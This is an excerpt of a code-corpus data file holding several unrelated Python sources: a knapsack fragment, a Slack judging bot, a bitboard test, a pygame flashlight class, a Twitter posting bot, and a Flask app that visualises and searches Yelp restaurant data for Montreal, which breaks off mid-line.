int(input())\n    ind = list(map(int,input().split()))\n    arr = list(map(int,input().split()))\n    print(solve(n,W,arr,ind))\n    t -= 1","sub_path":"Dynamic programming/0_1_knapsack.py","file_name":"0_1_knapsack.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"77027536","text":"# coding: utf-8\r\n# Starting function\r\n# Created by James Raphael Tiovalen (2020)\r\n\r\nimport slack\r\nimport config\r\n\r\nfrom slackers.hooks import commands\r\n\r\nconv_db = config.conv_handler\r\n\r\n\r\n@commands.on(\"start\")\r\ndef start(payload):\r\n    channel = payload[\"channel_id\"]\r\n    user_id = payload[\"user_id\"]\r\n    state = conv_db.get_state(channel, user_id)\r\n\r\n    if (state == config.TEAM_REMARKS) or (state == config.EDIT_REMARKS):\r\n        config.web_client.chat_postMessage(\r\n            channel=channel,\r\n            text=f\"You can only end your judging process or reply with a photo of your remarks at this point, <@{user_id}>!\",\r\n        )\r\n\r\n    else:\r\n        message = (\r\n            f\"Hi <@{user_id}>! 
This Slack Bot provides helpful commands to assist SUTD What The Hack judges in collating candidate scores and judging notes.\\r\\n\\r\\n\"\r\n \"• /start to start the bot.\\r\\n\"\r\n \"• /judge to begin the judging sequence.\\r\\n\"\r\n \"• /edit to edit a previous judging decision.\\r\\n\"\r\n \"• /cancel to abandon the current ongoing conversation.\\r\\n\"\r\n \"• /summary to view your scoring progress so far.\\r\\n\"\r\n \"• /leaderboard to display the leaderboard.\\r\\n\"\r\n \"• /viewdb to display an overall view of the whole database.\\r\\n\"\r\n \"• /randomize to execute the group randomizer algorithm.\\r\\n\\r\\n\"\r\n \"For judges, please take note that your conversation state is different across different channels and workspaces.\\r\\n\"\r\n )\r\n config.web_client.chat_postMessage(channel=channel, text=message)\r\n\r\n return\r\n","sub_path":"app/handlers/utils/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"397895153","text":"import sys\ndef unsafe_x(player):\n\t#returns number of unsafe x pieces\n\tcount = 0\n\tif (1 << 9) & player and not (1 << 0) & player: count += 1\n\tif (1 << 14) & player and not (1 << 7) & player: count += 1\n\tif (1 << 49) & player and not (1 << 56) & player: count += 1\n\tif (1 << 54) & player and not (1 << 63) & player: count += 1\n\treturn count \n\ndef unsafe_xx(player):\n\t#returns number of unsafe x pieces\n\tcount = 0\n\tif (1 << 9) & player & (0 << 0): count += 1\n\tif (1 << 14) & player & (0 << 7): count += 1\n\tif (1 << 49) & player & (0 << 56): count += 1\n\tif (1 << 54) & player & (0 << 63): count += 1\n\treturn count \nvar = 0xC242000000000000\nprint(unsafe_x(var), unsafe_xx(var))","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"451921919","text":"import pygame, math as M\nfrom pygame import *\npygame.init()\n\n\nclass Flashlight(sprite.Sprite):\n def __init__(self, x, y, image, width=400, height=400):\n sprite.Sprite.__init__(self)\n self.x = x\n self.y = y\n self.w = width\n self.h = height\n self.image = image.convert_alpha()\n self.surface = pygame.Surface((400, 400), SWSURFACE, image)\n self.rect = Rect(x - width/2, y-height/2, width, height)\n self.image = image\n self.image = pygame.transform.rotate(self.image, 0).convert_alpha()\n self.image = pygame.transform.smoothscale(self.image, (self.w, self.h))\n self.displaying_image = image\n self.rect = self.image.get_rect()\n self.angle = 0\n self.condition = False\n self.charge_level = self.charge_max = 179\n self.charge_bg_im = pygame.image.load(\"data\\\\flashlight\\\\charge.gif\")\n self.charge_surface = pygame.Surface((179, 27))\n self.charge_surface.fill((255, 255, 0))\n\n def update(self, screen, mouse, player):\n if self.charge_level == 0:\n self.condition = False\n if self.condition:\n mouse.set_pressed()\n if mouse.pressed_buttons[0]:\n mouse.set_position()\n self.angle = M.degrees(M.atan2(mouse.position[1] - player.rect.centery,\n mouse.position[0] - player.rect.centerx))\n\n self.displaying_image = pygame.transform.rotozoom(self.image, -self.angle, 1)\n self.rect = self.displaying_image.get_rect()\n self.rect.center = (player.rect.centerx, player.rect.centery)\n if self.condition:\n screen.blit(self.displaying_image, self.rect)\n self.charge_level -= 0.15\n if self.charge_level <= 0:\n self.charge_level = 0\n 
self.charge_surface = pygame.Surface((self.charge_level, 27))\n self.charge_surface.fill((255, 255, 0))\n\n def show_cur_charge(self, screen):\n screen.blit(self.charge_bg_im, (20, 20))\n screen.blit(self.charge_surface, (65, 30))\n\n def turn(self):\n self.condition = not self.condition\n\n def refresh(self):\n self.condition = False\n self.charge_level = self.charge_max = 179\n self.charge_surface = pygame.Surface((179, 27))\n self.charge_surface.fill((255, 255, 0))\n\n\n\n","sub_path":"flashlight.py","file_name":"flashlight.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"108061657","text":"import twitter\nfrom local_settings import *\n\ndef connect():\n api = twitter.Api(consumer_key=MY_CONSUMER_KEY,\n consumer_secret=MY_CONSUMER_SECRET,\n access_token_key=MY_ACCESS_TOKEN_KEY,\n access_token_secret=MY_ACCESS_TOKEN_SECRET)\n return api\n\nif __name__==\"__main__\":\n api=connect()\n api.PostUpdate(\"hello world\")\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"205112671","text":"from flask import Flask, session, render_template, url_for, request, redirect\r\nfrom flask_wtf import FlaskForm\r\nfrom wtforms.fields.html5 import DateField\r\nfrom datetime import date\r\nimport gmplot\r\nfrom wtforms import SelectField, Form, StringField, validators, RadioField\r\nimport pandas as pd\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom bokeh.charts import BoxPlot, Bar, output_file, show, output_notebook\r\nfrom pandas.tools.plotting import table\r\nfrom wordcloud import WordCloud, STOPWORDS\r\nimport nltk\r\nimport numpy as np\r\nimport requests\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn import preprocessing\r\nfrom sklearn.neighbors import NearestNeighbors\r\nfrom nltk.corpus import wordnet as wn\r\nfrom collections import Counter\r\nfrom wtforms import BooleanField\r\nfrom flask_wtf import Form\r\nfrom math import sqrt\r\nfrom scipy.misc import imread\r\nglobal text\r\nglobal label_food\r\nfrom bokeh.embed import autoload_server\r\nfrom bokeh.client import push_session, pull_session\r\nfrom bokeh.resources import Resources\r\nimport subprocess\r\nimport atexit\r\nimport platform\r\nimport time\r\n\r\n\r\n\r\napp = Flask(__name__)\r\n\r\napp.secret_key = 'Yelp'\r\n\r\nbusiness = pd.read_csv(\"Montreal.csv\",encoding = \"latin1\")\r\nuser = pd.read_csv(\"user.csv\")\r\nreview = pd.read_csv(\"review.csv\")\r\n\r\nuser[\"yelping_since\"]=pd.to_datetime(user[\"yelping_since\"])\r\nreview[\"review_len\"] = [len(t) for t in review[\"text\"]]\r\nfood = wn.synset('food.n.02')\r\nfoodlist=list(set([w for s in food.closure(lambda s:s.hyponyms()) for w in s.lemma_names()]))\r\n\r\nclass queryForm(FlaskForm):\r\n\tprice = SelectField('Price', choices=[('<10', '<10'), ('10~30', '10~30'), ('30~60', '30~60'),('>60','>60')])\r\n\tparking = SelectField('Parking', choices=[('Not Necessary', 'Not Necessary'), ('Yes', 'Yes')])\r\n\tcategory = StringField('Categories', [validators.Length(min=1, max=40)])\r\n\taccess = SelectField('Access', choices=[('Not Necessary', 'Not Necessary'), ('Yes', 'Yes')])\r\n\tdeliver = SelectField('Deliver', choices=[('Not Necessary', 'Not Necessary'), ('Yes', 'Yes')])\r\n\trsvp = SelectField('RSVP', choices=[('Not Necessary', 'Not Necessary'), ('Yes', 'Yes')])\r\n\tmorning = 
SelectField('Morning', choices=[('Not Necessary', 'Not Necessary'), ('Yes', 'Yes')])\r\n\tnoon = SelectField('Noon', choices=[('Not Necessary', 'Not Necessary'), ('Yes', 'Yes')])\r\n\tevening = SelectField('Evening', choices=[('Not Necessary', 'Not Necessary'), ('Yes', 'Yes')])\r\n\tnight = SelectField('Night', choices=[('Not Necessary', 'Not Necessary'), ('Yes', 'Yes')])\r\n\tgroup = SelectField('Group', choices=[('Not Necessary', 'Not Necessary'), ('Yes', 'Yes')])\r\n\r\nclass recommendForm1(FlaskForm):\r\n\tfunny = RadioField('Funny', choices=[('f1', 'Strongly disagree'), ('f2', 'Disagree'), ('f3', 'Neither agree nor disagree'), ('f4', 'Agree'), ('f5', 'Strongly agree')])\r\n\tcool = RadioField('Cool', choices=[('c1', 'Strongly disagree'), ('c2', 'Disagree'), ('c3', 'Neither agree nor disagree'), ('c4', 'Agree'), ('c5', 'Strongly agree')])\r\nclass recommendForm2(FlaskForm):\r\n\tcategory = StringField('Category', [validators.Length(min=1, max=40)])\r\n\ttime = SelectField('Time', choices=[('t1', 'morning'), ('t2', 'noon'), ('t3', 'evening'), ('t4', 'late night'), ('t5', 'not sure')])\r\n\tpurpose = SelectField('Purpose', choices=[('p1', 'dating'), ('p2', 'business'), ('p3', 'friends'), ('p4', 'families'), ('p5', 'single'), ('p6', 'tourist')])\r\n\r\nclass recommendForm3(FlaskForm):\r\n\tpic_choice = RadioField('Pic_choice', choices=[('p1', 'This is my favorite'), ('p2', 'This is my favorite'), ('p3', 'This is my favorite'), ('p4', 'This is my favorite'), ('p5', 'This is my favorite'), ('p6', 'This is my favorite'), ('p7', 'This is my favorite'), ('p8', 'This is my favorite')])\r\n\r\nclass recommendForm4(FlaskForm):\r\n\treviewOrstar = SelectField('ReviewOrstar', choices=[('r1', 'star'), ('r2', 'review')])\r\n\r\nclass reviewForm(FlaskForm):\r\n\tkeyword = StringField('Keyword', [validators.Length(min=1, max=40)])\r\n\r\nclass featureForm(Form):\r\n\tbox1=BooleanField('check1')\r\n\tbox2=BooleanField('check2')\r\n\tbox3=BooleanField('check3')\r\n\tbox4=BooleanField('check4')\r\n\tbox5=BooleanField('check5')\r\n\tbox6=BooleanField('check6')\r\n\tbox7=BooleanField('check7')\r\n\tbox8=BooleanField('check8')\r\n\tbox9=BooleanField('check9')\r\n\tbox10=BooleanField('check10')\r\n\tbox11=BooleanField('check11')\r\n\tbox12=BooleanField('check12')\r\n\tbox13=BooleanField('check13')\r\n\tbox14=BooleanField('check14')\r\n\tbox15=BooleanField('check15')\r\n\tbox16=BooleanField('check16')\r\n\tbox17=BooleanField('check17')\r\n\tbox18=BooleanField('check18')\r\n\tbox19=BooleanField('check19')\r\n\tbox20=BooleanField('check20')\r\n\tbox_all=BooleanField('all')\r\n\r\ndef get_homepage_links():\r\n\treturn [ {\"href1\": url_for('visualize'), \"label1\":\"A Glance at Data\"},\r\n\t\t\t\t{\"href2\": url_for('query'), \"label2\":\"Find Your Restaurants\"},\r\n\t\t\t\t{\"href3\": url_for('reviewpage'), \"label3\":\"Taste Food\"},\r\n\t\t\t\t{\"href4\": url_for('recommend0'), \"label4\":\"Recommendation\"},\r\n\t\t\t\t]\r\n\r\ndef get_links():\r\n\treturn [{\"href\": url_for('business1'), \"label\":\"Restaurants Heatmap\"},\r\n\t\t\t\t{\"href\": url_for('business2'), \"label\":\"Restaurants by Neighborhoods\"},\r\n\t\t\t\t{\"href\": url_for('business3'), \"label\":\"Restaurants by Stars\"},\r\n\t\t\t\t{\"href\": url_for('business4'), \"label\":\"Restaurants' Number of Reviews\"},\r\n\t\t\t\t{\"href\": url_for('user1'), \"label\":\"New Users Every Month\"},\r\n\t\t\t\t{\"href\": url_for('user2'), \"label\":\"Users' Average Stars\"},\r\n\t\t\t\t{\"href\": url_for('user3'), \"label\":\"Users' Number of 
Reviews\"},\r\n\t\t\t\t{\"href\": url_for('reviews1'), \"label\":\"Reviews Count Across Years\"},\r\n\t\t\t\t{\"href\": url_for('reviews2'), \"label\":\"Distribution of Stars\"},\r\n\t\t\t\t{\"href\": url_for('reviews3'), \"label\":\"Length of Review Texts\"},\r\n\t\t\t\t{\"href\": url_for('join1'), \"label\":\"Review Length and Review Count\"},\r\n\t\t\t\t{\"href\": url_for('join2'), \"label\":\"Review Length (Grouped by Stars of Businesses)\"},\r\n\t\t\t\t{\"href\": url_for('overview'), \"label\":\"Overview\"}\r\n\t\t\t\t]\r\n\r\ndef get_review_links(keyword):\r\n\treturn {\"href\": url_for('review_feature'), \"label\":\" Taste your favorate food at '%s' \" % keyword}\r\n\r\ndef get_recommend1_links():\r\n\treturn {\"href\": url_for('recommend1'), \"label\":\"Let's GO!\"}\r\n\r\n@app.route(\"/\")\r\ndef home():\r\n\tsession[\"data_loaded\"] = True\r\n\treturn render_template('home.html', links=get_homepage_links())\r\n\r\n@app.route(\"/visualize/\", methods=['GET','POST'])\r\ndef visualize():\r\n\treturn render_template('visualization.html', links=get_links())\r\n\r\n@app.route(\"/visualize/overview/\", methods=['GET','POST'])\r\ndef overview():\r\n\tconnected = False\r\n\twhile not connected:\r\n\t\ttry:\r\n\t\t\tport = 5000+np.random.randint(0,100)\r\n\t\t\tsubprocess.Popen(['bokeh', 'serve', '--show', 'visualize.py', '--port',str(port)]) \r\n\t\t\tconnected = True\r\n\t\texcept:\r\n\t\t\tpass\r\n\treturn redirect(url_for('visualize'))\r\n\r\n@app.route(\"/visualize/business1/\", methods=['GET','POST'])\r\ndef business1():\r\n\tlatitudes = business[\"latitude\"]\r\n\tlongitudes = business[\"longitude\"]\r\n\tgmap = gmplot.GoogleMapPlotter.from_geocode(\"Montreal\",8)\r\n\tgmap.heatmap(latitudes, longitudes)\r\n\tgmap.draw('templates/Montreal.html')\r\n\treturn render_template('businessoutput1.html', mapfile = 'Montreal.html')\r\n\t\r\n@app.route(\"/visualize/business2/\", methods=['GET','POST'])\r\ndef business2():\r\n\tplt.clf()\r\n\tneighbordata = business[[\"business_id\",\"neighborhoods\"]]\r\n\tneighbordata[\"neighborhoods\"] = [i.strip('[]').strip(\"''\") for i in neighbordata[\"neighborhoods\"]]\r\n\tneighbordata[\"neighborhoods\"] = [i.replace('\\\\xe9', str(\"\\xe9\")) for i in neighbordata[\"neighborhoods\"]]\r\n\tneighbordata[\"neighborhoods\"] = [i.replace(\"u'\", \"\") for i in neighbordata[\"neighborhoods\"]]\r\n\tneighbordata[\"neighborhoods\"] = [i.replace(\"\\\\xe8\", str(\"\\xe8\")) for i in neighbordata[\"neighborhoods\"]]\r\n\tneighbordata[\"neighborhoods\"] = [i.replace(\"\\\\xf4\", str(\"\\xf4\")) for i in neighbordata[\"neighborhoods\"]]\r\n\tneighbordata[\"neighborhoods\"] = [i.replace(\"\\\\xe2\", str(\"\\xe2\")) for i in neighbordata[\"neighborhoods\"]]\r\n\tneighbordata[\"neighborhoods\"] = [i.replace(\"\\\\u\", \"\") for i in neighbordata[\"neighborhoods\"]]\r\n\tplt.figure(figsize=(15,5))\r\n\tax = sns.countplot(x=\"neighborhoods\", data=neighbordata, palette=\"GnBu_d\")\r\n\trects = ax.patches\r\n\tlabels = [l.get_text() for l in ax.xaxis.get_ticklabels()]\r\n\tfor rect, label in zip(rects, labels):\r\n\t height = rect.get_height()\r\n\t ax.text(rect.get_x() + rect.get_width()/2, height+20, label, ha='center', va='bottom',rotation=90, fontsize=9)\r\n\tax.xaxis.set_ticklabels([])\r\n\tfig = ax.get_figure()\r\n\tfig.savefig('static/business2.png')\r\n\treturn render_template('businessoutput2.html')\r\n\t\r\n@app.route(\"/visualize/business3/\", methods=['GET','POST'])\r\ndef business3():\r\n\tplt.clf()\r\n\tax = sns.countplot(x=\"stars\", data=business, 
palette=\"Blues\")\r\n\tfig = ax.get_figure()\r\n\tfig.savefig('static/business3.png')\r\n\treturn render_template('businessoutput3.html')\r\n\r\n@app.route(\"/visualize/business4/\", methods=['GET','POST'])\r\ndef business4():\r\n\tplt.clf()\r\n\tplt.figure(figsize=(15,5))\r\n\tsns.plt.title(\"Restaurants' Number of Reviews\",fontsize=20)\r\n\tax1 = sns.distplot(business[\"review_count\"])\r\n\tfig1 = ax1.get_figure()\r\n\tfig1.savefig('static/business4_1.png')\r\n\r\n\tplt.clf()\r\n\tplt.figure(figsize=(15,5))\r\n\tsns.plt.title(\"Restaurants' Number of Reviews (Grouped by Stars)\",fontsize=20)\r\n\tax2 = sns.stripplot(x=\"stars\", y=\"review_count\", data=business)\r\n\tfig2 = ax2.get_figure()\r\n\tfig2.savefig('static/business4_2.png')\t\r\n\treturn render_template('businessoutput4.html')\r\n\r\n@app.route(\"/visualize/user1/\", methods=['GET','POST'])\r\ndef user1():\r\n\tplt.clf()\r\n\tplt.figure(figsize=(15,5))\r\n\tplt.xlabel('Months')\r\n\tplt.ylabel('# of New Users')\r\n\tplt.xticks(rotation=45)\r\n\tax = sns.countplot(x=\"yelping_since\", data=user,palette=\"GnBu_d\")\r\n\tticks = ax.xaxis.get_ticklocs()\r\n\txtl = [item.get_text()[:7] for item in ax.xaxis.get_ticklabels()]\r\n\tax.xaxis.set_ticks(ticks[::5])\r\n\tax.xaxis.set_ticklabels(xtl[::5])\r\n\tfig = ax.get_figure()\r\n\tfig.savefig('static/user1_1.png')\r\n\r\n\tplt.clf()\r\n\tplt.figure(figsize=(15,5))\r\n\tnewuser = user.groupby('yelping_since')\r\n\tmatplotlib.style.use('ggplot')\r\n\tplt.xlabel('Months')\r\n\tplt.ylabel('# of New Users')\r\n\tplt.xticks(rotation=45)\r\n\tax2 = newuser.size().plot()\r\n\tfig2 = ax2.get_figure()\r\n\tfig2.savefig('static/user1_2.png')\t\r\n\r\n\treturn render_template('useroutput1.html')\r\n\r\n@app.route(\"/visualize/user2/\", methods=['GET','POST'])\r\ndef user2():\r\n\tplt.clf()\r\n\tplt.xlim(xmin=0)\r\n\tplt.xlim(xmax=5)\r\n\tax = sns.distplot(user[\"average_stars\"])\r\n\tfig = ax.get_figure()\r\n\tfig.savefig('static/user2.png')\t\r\n\treturn render_template('useroutput2.html')\r\n\r\n@app.route(\"/visualize/user3/\", methods=['GET','POST'])\r\ndef user3():\r\n\tplt.clf()\r\n\tax = sns.distplot(user[\"review_count\"])\r\n\tfig = ax.get_figure()\r\n\tfig.savefig('static/user3.png')\t\r\n\treturn render_template('useroutput3.html')\r\n\r\n@app.route(\"/visualize/reviews1/\", methods=['GET','POST'])\r\ndef reviews1():\r\n\tplt.clf()\r\n\tnewreview = review[[\"business_id\", \"date\"]]\r\n\tnewreview[\"date\"]=pd.to_datetime(newreview[\"date\"])\r\n\tnewreview[\"newdate\"] = 100*newreview[\"date\"].dt.year + newreview[\"date\"].dt.month\r\n\tplt.figure(figsize=(15,5))\r\n\tax = sns.countplot(x=\"newdate\", data=newreview, palette=\"GnBu_d\")\r\n\tticks = ax.xaxis.get_ticklocs()\r\n\txtl = [item.get_text()[:7] for item in ax.xaxis.get_ticklabels()]\r\n\tax.xaxis.set_ticks(ticks[::5])\r\n\tax.xaxis.set_ticklabels(xtl[::5])\r\n\tplt.xlabel('Date')\r\n\tplt.ylabel('# of Reviews')\r\n\tplt.xticks(rotation=45)\r\n\tfig = ax.get_figure()\r\n\tfig.savefig('static/reviews1.png')\r\n\treturn render_template('reviewsoutput1.html')\r\n\r\n@app.route(\"/visualize/reviews2/\", methods=['GET','POST'])\r\ndef reviews2():\r\n\tplt.clf()\r\n\tax = sns.countplot(x=\"stars\", data=review, palette=sns.cubehelix_palette(5))\r\n\tfig = ax.get_figure()\r\n\tfig.savefig('static/reviews2.png')\t\r\n\treturn render_template('reviewsoutput2.html')\r\n\r\n@app.route(\"/visualize/reviews3/\", methods=['GET','POST'])\r\ndef 
reviews3():\r\n\tplt.clf()\r\n\tplt.figure(figsize=(15,5))\r\n\tplt.xlim(xmin=0)\r\n\tplt.xlim(xmax=5000)\r\n\tsns.plt.title(\"Length of Review Texts (Histogram)\",fontsize=20)\r\n\tax1 = sns.distplot(review[\"review_len\"])\r\n\tfig1 = ax1.get_figure()\r\n\tfig1.savefig('static/reviews3_1.png')\r\n\t\r\n\tplt.clf()\r\n\tplt.figure(figsize=(15,5))\r\n\tmatplotlib.style.use('seaborn-pastel')\r\n\tsns.plt.title(\"Length of Review Texts (Boxplot)\",fontsize=20)\r\n\tax2 = sns.boxplot(review['review_len'])\r\n\tfig2 = ax2.get_figure()\r\n\tfig2.savefig('static/reviews3_2.png')\r\n\r\n\tplt.clf()\r\n\tplt.figure(figsize=(15,5))\r\n\tplt.xticks(rotation=90)\r\n\tsns.plt.title(\"Length of Reviews v. Votes Useful\",fontsize=20)\r\n\tax3 = sns.stripplot(y=\"votes.useful\", x=\"review_len\", data=review, jitter=True)\r\n\tticks = ax3.xaxis.get_ticklocs()\r\n\txtl = [item.get_text() for item in ax3.xaxis.get_ticklabels()]\r\n\tax3.xaxis.set_ticks(ticks[::50])\r\n\tax3.xaxis.set_ticklabels(xtl[::50])\r\n\tfig3 = ax3.get_figure()\r\n\tfig3.savefig('static/reviews3_3.png')\r\n\r\n\treturn render_template('reviewsoutput3.html')\r\n\r\n@app.route(\"/visualize/join1/\", methods=['GET','POST'])\r\ndef join1():\r\n\tplt.clf()\r\n\tbusinessreview = pd.merge(business,review, on=\"business_id\", how=\"inner\")\r\n\tsub = businessreview[[\"business_id\",\"review_len\"]]\r\n\tavg = sub.groupby('business_id').mean()\r\n\tavg = avg.reset_index()\r\n\tm = pd.merge(business, avg, on=\"business_id\", how=\"inner\")\r\n\tg = sns.jointplot(x=\"review_count\", y=\"review_len\", data=m)\r\n\tg.savefig('static/join1.png')\t\r\n\treturn render_template('joinoutput1.html')\t\r\n\r\n@app.route(\"/visualize/join2/\", methods=['GET','POST'])\r\ndef join2():\r\n\tplt.clf()\r\n\tbusinessreview = pd.merge(business,review, on=\"business_id\", how=\"inner\")\r\n\tsub = businessreview[[\"business_id\",\"review_len\"]]\r\n\tavg = sub.groupby('business_id').mean()\r\n\tavg = avg.reset_index()\r\n\tm = pd.merge(business, avg, on=\"business_id\", how=\"inner\")\r\n\tplt.figure(figsize=(15,5))\t\r\n\tax = sns.boxplot(m['stars'],m['review_len'])\r\n\tfig = ax.get_figure()\r\n\tfig.savefig('static/join2.png')\t\r\n\treturn render_template('joinoutput2.html')\t\r\n\r\n@app.route('/query/',methods=['GET','POST'])\r\ndef query():\r\n\tform = queryForm()\r\n\tif form.validate_on_submit():\r\n\t\tcategory = request.form.get('category')\r\n\t\tprice = request.form.get('price')\r\n\t\tparking = request.form.get('parking')\r\n\t\taccess = request.form.get('access')\r\n\t\tdeliver = request.form.get('deliver')\r\n\t\trsvp = request.form.get('rsvp')\r\n\t\tmorning = request.form.get('morning')\r\n\t\tnoon = request.form.get('noon')\r\n\t\tevening = request.form.get('evening')\r\n\t\tnight = request.form.get('night')\r\n\t\tgroup = request.form.get('group')\r\n\r\n\t\tx1 = business[business['categories'].str.contains(category, case = False)]\r\n\t\r\n\t\tif price == \"<10\":\r\n\t\t\tcode = 1\r\n\t\tif price == \"10~30\":\r\n\t\t\tcode = 2\r\n\t\tif price == \"30~60\":\r\n\t\t\tcode = 3\r\n\t\tif price == \">60\":\r\n\t\t\tcode = 4\r\n\t\tx21 = x1[x1['attributes.Price Range'] == code]\r\n\t\tx22 = x1[x1['attributes.Price Range'].isnull()]\r\n\t\tx2 = pd.concat([x21, x22])\r\n\t\r\n\t\tif parking == \"Yes\":\r\n\t\t\tx3 = x2[x2['attributes.Parking.street'] == True]\r\n\t\tif parking == \"Not Necessary\":\r\n\t\t\tx3 = x2\r\n\r\n\t\tif access == \"Yes\":\r\n\t\t\tx4 = x3[x3['attributes.Wheelchair Accessible'] == True]\r\n\t\tif access == \"Not 
Necessary\":\r\n\t\t\tx4 = x3\r\n\r\n\t\tif deliver == \"Yes\":\r\n\t\t\tx5 = x4[x4['attributes.Delivery'] == True]\r\n\t\tif deliver == \"Not Necessary\":\r\n\t\t\tx5 = x4\r\n\r\n\t\tif rsvp == \"Yes\":\r\n\t\t\tx6 = x5[x5['attributes.Takes Reservations'] == True]\r\n\t\tif rsvp == \"Not Necessary\":\r\n\t\t\tx6 = x5\r\n\r\n\t\tif morning == \"Yes\":\r\n\t\t\tx7 = x6[x6['attributes.Good For.breakfast'] == True]\r\n\t\tif morning == \"Not Necessary\":\r\n\t\t\tx7 = x6\r\n\r\n\t\tif noon == \"Yes\":\r\n\t\t\tx8 = x7[x7['attributes.Good For.lunch'] == True]\r\n\t\tif noon == \"Not Necessary\":\r\n\t\t\tx8 = x7\r\n\r\n\t\tif evening == \"Yes\":\r\n\t\t\tx9 = x8[x8['attributes.Good For.dinner'] == True]\r\n\t\tif evening == \"Not Necessary\":\r\n\t\t\tx9 = x8\r\n\r\n\t\tif night == \"Yes\":\r\n\t\t\tx10 = x9[x9['attributes.Good For.latenight'] == True]\r\n\t\tif night == \"Not Necessary\":\r\n\t\t\tx10 = x9\r\n\r\n\t\tif group == \"Yes\":\r\n\t\t\tx11 = x10[x10['attributes.Good For Groups'] == True]\r\n\t\tif group == \"Not Necessary\":\r\n\t\t\tx11 = x10\r\n\t\t\r\n\t\trestaurant = x11.sort_values('stars', ascending = False)\r\n\r\n\t\tresult = restaurant[['name', 'full_address', 'stars','review_count']].reset_index().drop('index', 1)\r\n\r\n\t\tresult[\"name\"] = [i.replace('?', '') for i in result[\"name\"]]\r\n\r\n\t\tresult.to_csv(\"query.csv\")\r\n\r\n\t\tlat = list(restaurant[\"latitude\"])\r\n\t\tlnt = list(restaurant[\"longitude\"])\r\n\t\tgmap = gmplot.GoogleMapPlotter(np.mean(lat),np.mean(lnt),12)\r\n\t\t#gmap.scatter(lat, lnt, 'k', marker=True)\r\n\t\tgmap.scatter(lat, lnt, '#3B0B39', size=200, marker=False)\r\n\t\tgmap.draw(\"templates/searchmap.html\")\r\n\r\n\t\tconnected = False\r\n\t\t#port = 5000+np.random.randint(0,100)\r\n\r\n\t\twhile not connected:\r\n\t\t\ttry:\r\n\t\t\t\tport = 5000+np.random.randint(0,100)\r\n\t\t\t\t# if 'window' in platform.system().lower():\r\n\t\t\t\t# \tbokeh_process = subprocess.Popen(\r\n\t\t\t\t# \t\t'bokeh serve --show q.py --port %d'%(port), shell=False, stdout=subprocess.PIPE)\r\n\t\t\t\t# \tconnected = True\r\n\t\t\t\t# else:\r\n\t\t\t\tsubprocess.Popen(['bokeh', 'serve', '--show', 'q.py', '--port',str(port)]) \r\n\t\t\t\tconnected = True\r\n\t\t\texcept:\r\n\t\t\t\tpass\r\n\r\n\t\ttime.sleep(6)\t\r\n\r\n\t\treturn render_template('queryoutput.html', mapfile='searchmap.html')\r\n\t\t#return render_template('queryoutput.html', )\r\n\t\t\r\n\treturn render_template('queryparams.html', form=form)\r\n\r\n\r\n@app.route('/review/',methods=['GET','POST'])\r\ndef reviewpage():\r\n\t\r\n\t# review-block-1: search_restaurant_function\r\n\tdef search_restaurant(keyword):\r\n\t\tN=len(business)\r\n\t\tsearch_result_name=list()\r\n\t\tfor i in range(0,N):\r\n\t\t\tif keyword.lower() in business.loc[i]['name'].lower():\r\n\t\t\t\tsearch_result_name.append(business.loc[i]['name']) \r\n\t\treturn business[business['name'].isin(list(search_result_name))]\r\n\r\n\t# review-block-2: get_review_fuction \r\n\tdef get_review(keyword):\r\n\t\tresult_frame=search_restaurant(keyword)\r\n\t\ttext=str()\r\n\t\tfor i in range(len(result_frame)):\r\n\t\t\tmyid=result_frame.iloc[i,16]\r\n\t\t\ttext=text+str(list(review[review['business_id']==result_frame.iloc[i,16]]['text']))\r\n\t\treturn text\r\n\r\n\t# review-block-3: get_cloud_fuction \r\n\tdef get_cloud(text,name):\r\n\t\tif len(text)<20:\r\n\t\t\treturn None\r\n\t\tdelete_words=[name.lower(),'food','restaurant',' one ','place',' really ',\\\r\n\t\t' go ',' year ',' come ',' the ',' a ','\\n',' is ',' are ',' of 
',' le ',' de ',' la ',' place ',\\\r\n\t\t' et ','side','plate','cut','green','heart','tongue']\r\n\t\tnewlist=list()\r\n\t\tfor word in delete_words:\r\n\t\t\ttext=text.replace(word,' ')\r\n\t\tfor word in text.split():\r\n\t\t\tif word in foodlist:\r\n\t\t\t\tnewlist.append(word)\r\n\t\tnewtext=' '.join(newlist)\r\n\t\twordcloud = WordCloud(stopwords=STOPWORDS,background_color='white',mask=imread('static/mask2.jpeg'),width=1200,height=1000).generate(newtext)\r\n\t\twordcloud.to_file(\"static/review_cloud_1.png\")\r\n\t\treturn newlist\r\n\r\n\t# review-block-4: main \r\n\tform = reviewForm()\r\n\tif form.validate_on_submit():\r\n\t\tkeyword = request.form.get('keyword')\r\n\t\tmyres=search_restaurant(keyword) #McDonald's, Marven's Restaurant\r\n\t\tif len(myres)>0:\r\n\t\t\tmyres=myres.sort_values(by=['stars','name'],ascending=False)\r\n\t\t\tplt.clf()\r\n\t\t\tax = sns.countplot(x=\"stars\", data=myres, palette=\"GnBu_d\")\r\n\t\t\tfig=ax.get_figure()\r\n\t\t\tsns.set(font_scale=1.5)\r\n\t\t\tave_star=round(np.mean(list(myres['stars'])),2)\r\n\t\t\tstd_star=round(np.std(list(myres['stars'])),2)\r\n\t\t\tresult=myres.loc[:,['name','full_address','stars']].head(45)\r\n\r\n\t\t\tlat = list(myres[\"latitude\"])\r\n\t\t\tlnt = list(myres[\"longitude\"])\r\n\t\t\tgmap = gmplot.GoogleMapPlotter(np.mean(lat),np.mean(lnt),12)\r\n\t\t\tgmap.scatter(lat, lnt, '#3B0B39', size=200, marker=False)\r\n\t\t\tgmap.draw(\"templates/reviewmap.html\")\r\n\t\t\tglobal text\r\n\t\t\ttext=get_review(keyword).lower()\r\n\t\t\tnewlist=get_cloud(text,keyword)\r\n\r\n\r\n\t\t\tcnt = 